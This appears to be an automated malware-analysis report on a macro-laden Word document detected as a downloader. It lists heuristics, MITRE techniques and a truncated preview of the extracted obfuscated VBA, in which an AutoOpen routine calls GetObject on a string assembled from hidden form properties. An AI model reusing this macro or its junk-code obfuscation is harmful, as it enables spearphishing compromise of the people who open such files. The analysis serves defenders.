Verdict: MALICIOUS
Risk Score: 222
Malware Insights
MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The sample is a Microsoft Office document containing a critical ClamAV detection for 'Doc.Downloader.W2000m-6931474-0'. Heuristics indicate the presence of a high-severity 'AutoOpen' VBA macro, which is designed to execute automatically upon opening the document. This macro likely functions as a downloader for a second-stage payload, a common technique for initial compromise via spearphishing attachments.
Heuristics (7)
- ClamAV: Doc.Downloader.W2000m-6931474-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.W2000m-6931474-0
- VBA macros detected (medium, OLE_VBA_MACROS; 3 related findings): Document contains VBA macro code
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- GetObject call (high, OLE_VBA_GETOBJ): GetObject call
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 25554 bytes |

SHA-256 (macros.bas): ed0ca1e148ea16b2097240ce0d9379d71c88be9ada89b3789ff066ed1bc796ef
Preview script (first 1,000 lines of the extracted script):

```vb
Attribute VB_Name = "SoBAx4Q_"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "lCUAGAAA"
Attribute VB_Base = "0{3263766E-7C9C-47D2-AE03-9A7A2FD40320}{847C4CF5-27AF-41D9-9E48-5742A3481441}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "nZAAGA"
Attribute VB_Base = "0{97C82851-8294-4A0B-B3B1-E6E4CF654E26}{92DD151C-C2FD-4924-8CAF-B0D86C5F7422}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "SAZBwAA"
Function PZAXUC()
If 639395081 = 468523898 Then
For dAAZADU = WAAUAw To sXAAQA
DBAAAAQA = 980213482 / CStr(d__XAUQ) + 613564320 * CStr(HAcXoQ) * 288192246 - Oct(30763785 * Fix(801516249) / 784304585 + Sqr(cAQ4xDx_)) - VoxGUckA + 250966079 - 209934578 + 723991384 - (aB4AAZwX - 55487804)
Next
End If
If 945740520 = 508345263 Then
For rBAUkA = kAQQxDo To w4AAADk
KBxGCUD = 34830500 / CStr(RwGAGUDB) + 248530036 * CStr(iUCQcoQC) * 97792482 - Oct(733076257 * Fix(508183140) / 578566676 + Sqr(wZABAAc)) - Pw11CB + 644895721 - 264944543 + 882671420 - (cBDkcA4 - 83975010)
Next
End If
End Function
Sub autoopen()
X4kAC41
End Sub
Function X4kAC41()
On Error Resume Next
If 381415662 = 523643351 Then
For WkZGQB = qoDAQDAD To bACGUcoB
DABAXA1A = 34350519 / CStr(XA1QQo) + 101051936 * CStr(BDBQx41Q) * 407000685 - Oct(530859863 * Fix(799781708) / 192496404 + Sqr(hcAAwAD)) - hQAAGo + 159937639 - 89850658 + 786649042 - (iUCxABAQ - 236446602)
Next
End If
If 62481451 = 976692641 Then
For cUQAUwQA = iQ_D4Q1A To jkB1AAD
tZGUQDAA = 62983889 / CStr(KDGAAZAA) + 96168501 * CStr(MoGxAk_A) * 647079346 - Oct(861966998 * Fix(418455363) / 250041282 + Sqr(vAUxA_)) - UA4_AkAA + 445343745 - 19784712 + 46295573 - (oAQAXB - 409519397)
Next
End If
If 122537323 = 539913252 Then
For hUcUA4 = PDoAUcAA To ABAAAcX
RUBAQUAG = 976554037 / CStr(RB4ABDQ) + 398762865 * CStr(EZAUQ_) * 638990164 - Oct(489861830 * Fix(644945482) / 998182612 + Sqr(rDA_AD)) - PAA1A_c + 999378808 - 588087166 + 694752590 - (LQAwxAwA - 105952207)
Next
End If
Set ZZckD1Z = GetObject(lCUAGAAA.tBDQAAoA.ControlTipText + nZAAGA.AQAZAGAk + lCUAGAAA.tBDQAAoA.ControlSource)
If 409540675 = 675461125 Then
For jDDBG4A = YcADXAB To zXoxDQ
wAAccG = 407708567 / CStr(QCQ_AoD) + 428772201 * CStr(Q__DoAA) * 680895855 - Oct(438820134 * Fix(770408561) / 611593776 + Sqr(s_A1QA_)) - Y4k4QA + 182914664 - 303434149 + 807868678 - (OAQQDAD - 845700435)
Next
End If
If 959612820 = 505739522 Then
For HCUxwAAA = jAw4XAA To ZAU_CX1
dxUkBww = 716295241 / CStr(tZCAAC) + 553326967 * CStr(KZCBCcxU) * 450225869 - Oct(486869772 * Fix(458924647) / 834246545 + Sqr(fDAABCx)) - PBkAQDD + 516606343 - 387752068 + 870531449 - (wAAAABAQ - 229425470)
Next
End If
If 433605227 = 419107072 Then
For WDkC4AQ = mAA4xAA To twQAkAX
CkAXAc = 168779632 / CStr(oAAAUo) + 29631811 * CStr(DQCDACB) * 545900391 - Oct(179726372 * Fix(74373340) / 107750793 + Sqr(mAGUGA)) - JA__GDCA + 802696639 - 655428173 + 304750702 - (GAwUADA - 596551354)
Next
End If
If 841638 = 841638 Then
If 607591849 = 416548192 Then
For jQCBBAU = BA4CAGAk To CBQ_QXX
wcxAA4Z = 837683094 / CStr(qwAGDC) + 435626955 * CStr(DDZkCC) * 357144838 - Oct(519124385 * Fix(901466208) / 63243981 + Sqr(TQA1Axw)) - qBAkBwA + 171925464 - 675244765 + 531749641 - (wGAUBD - 84752475)
Next
End If
If 361246655 = 242944774 Then
For zABZ1CAA = KxwGXUQB To aU_o
... (truncated)
```